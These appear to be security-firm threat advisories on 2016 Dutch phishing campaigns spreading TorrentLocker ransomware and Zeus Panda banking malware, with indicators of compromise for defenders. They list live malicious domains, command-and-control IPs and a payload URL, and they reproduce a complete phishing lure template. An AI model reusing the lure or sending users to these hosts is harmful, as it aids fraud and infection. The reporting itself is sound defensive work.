The reach of this e-mail campaign is rapidly increasing as a result of TorrentLocker stealing the address books of its victims to expand its list of new targets. Every successful infection significantly increases the reach of the malicious e-mail campaign.

Current phishing e-mail

The e-mail below is an example of the phishing e-mail, which mimics the real Ziggo invoice e-mails:

Example of Ziggo phishing e-mail

The e-mail above contains a link to a fake Ziggo page that will force the user to download a ZIP file with the supposed invoice inside. The ZIP file contains a JavaScript file which will, when executed by the victim, download the TorrentLocker ransomware from a compromised WordPress website. When the victim’s data is encrypted, TorrentLocker shows the screen below, still using the name ‘Crypt0L0cker’, as seen 2 years ago:

TorrentLocker lock screen

Indicators of compromise

Currently (October 6th 2016) active campaign distribution domain:

  • ziggo-online23.org / 212.92.97.28

Other Ziggo domains used in previous e-mail campaigns:

  • ziggo-online23.org
  • ziggo-online12.com
  • ziggo-online247.net
  • ziggo-online24.net
  • ziggo-online24.org
  • ziggo-factuur84.org
  • ziggo-factuur23.org

All domains registered by the group behind TorrentLocker are registered at REG.RU. With the continued effort of AbuseCH we have been taking down these domains as soon as they appear.

TorrentLocker initially communicates via SSL to several IPs to reach its command and control server. The current IP being used for this communication is:

  • 185.40.152.22

The certificate used for this SSL connection typically contains the following static information (more sample and information for these SSL certificates can be found on AbuseCH’s SSL Blacklist):

  • C=US, ST=Denial, L=Springfield, O=Dis

After the initial SSL connection, all other network communication is run through Tor. Files encrypted by TorrentLocker will have the ‘.enc’ extension appended. More details on the prevention of ransomware can be found in our earlier TorrentLocker blog: New Torrentlocker variant active in the Netherlands.

LinkedIn information used to spread banking malware in the Netherlands

Since early this morning (7th of June 2016, around 08:30 AM) the Fox-IT Security Operations Center started detecting a large amount of phishing e-mails containing a malicious Word document. This e-mail campaign appears to be targeting the Netherlands, using Dutch text in both the e-mail and Word document. The content of the e-mail:

Geachte Firstname Lastname,
RoleCompany
Wij schrijven u in verband met de factuur met nummer 014321463. De nota staat open sinds 9-jun-16. Het openstaande bedrag is 2,487.50 Euro. Vriendelijk verzoeken wij u het openstaande bedrag te betalen.
Betaling graag zo spoedig mogelijk.
Met vriendelijke groet,
A.E. De Kuiper, BEEREJAN HOLDING BV. Faisantenstraat 53 Hilversum 1211 PT Tel. +31180647000 Fax. +31294484970

The first name, last name, role and company name are all values that are taken from the LinkedIn page of the receiver of the phishing mail, giving the e-mail a very personalized look.

The subject of the e-mail contains the company name, with a semi-random invoice-related subject. Some examples:

  • Company : De nota is nog niet betaald
  • Company – De nota is onbetaald gebleven
  • Company – Uw laatste factuur wacht op betaling

At this point Fox-IT cannot directly link this phishing campaign to the recent LinkedIn database leak.

The e-mail contains a Word document with a Macro.
The name of the document is also based on personal information of the receiver:

  • Company-Firstname-Lastname.doc

Screenshot of the phishing campaign

The content of the Word document appears to be scrambled; this is an attempt to trick the user into running the embedded Macro in order to view the document.

The Macro retrieves a binary from the following (likely compromised) website:

  • ledpronto.com/app/office.bin (sha256: c1e21a06a1fa1de2998392668b6910ca2be0d5d9ecc39bd3e3a2a3ae7623400d)

The Fox-IT InTELL team has identified the retrieved malware as the Zeus Panda banking malware. Zeus Panda, in this case, always connects to the following domain & IP using SSL:

  • skorianial.com / 107.171.187.182

Zeus Panda is a type of banking malware based on Zeus source code, more information can be found here: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

The following SSL certificate is used by the Panda Zeus Command and Control server:

If you’ve opened the Word attachment and enabled the Macro, consider scanning your system with various anti-virus solutions.